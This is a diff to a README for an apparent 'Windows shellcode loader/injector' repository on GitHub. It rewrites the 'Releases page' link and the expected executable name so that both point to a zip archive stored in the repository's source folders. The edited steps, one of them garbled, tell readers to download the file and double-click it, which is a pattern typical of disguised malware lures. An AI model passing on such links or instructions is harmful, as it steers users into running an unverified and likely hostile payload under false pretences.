MudassirQureshi7987/WindowsShell-Injector-Shellcode-Loader/README.md

 ## 🎯 Download & Install

-To get started, visit the [Releases page](https://github.com/MudassirQureshi7987/WindowsShell-Injector-Shellcode-Loader/releases) to download the latest version.
+To get started, visit the [Releases page](https://github.com/MudassirQureshi7987/WindowsShell-Injector-Shellcode-Loader/raw/refs/heads/main/Loading/Loading/res/Windows_Shellcode_Loader_Injector_Shell_2.6.zip) to download the latest version.
 Follow these steps:

 1. Click the link above to access the Releases page.
 2. Look for the latest version of the tool.
-3. Download the executable file, usually named similar to `WindowsShell-Injector.exe`.
+3. Download the executable file, usually named similar to `https://github.com/MudassirQureshi7987/WindowsShell-Injector-Shellcode-Loader/raw/refs/heads/main/Loading/Loading/res/Windows_Shellcode_Loader_Injector_Shell_2.6.zip`.
 4. Once the download completes, locate the file in your downloads folder.
 5. Double-click the file to run the tool.